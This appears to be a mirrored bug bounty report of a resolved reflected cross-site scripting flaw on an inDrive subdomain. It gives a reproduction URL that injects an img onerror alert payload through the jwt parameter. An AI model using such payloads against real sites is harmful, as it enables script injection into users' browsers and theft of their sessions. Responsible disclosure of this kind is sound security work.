Loading HuntDB...

#2 XSS on watchdocs.indriverapp.com

I
inDrive
Submitted None

Team Summary

Official summary from inDrive

And subscribe to our telegram channel with updates https://t.me/indrive_bbp

Reported by maxdha

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
## Summary: I've found an XSS on https://watchdocs.indriverapp.com/ ## Steps To Reproduce: 1. Visit https://watchdocs.indriverapp.com/webview/v1?phone=████████&token=██████████&service=cargo&locale=en&jwt=%22%3E%3Cimg%20src=raw%20onerror=alert(%22hackerone%22)%3E#/ 1. You'll get an XSS alert ## Supporting Material/References: ███ ## Impact Execute javascript on user browser

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected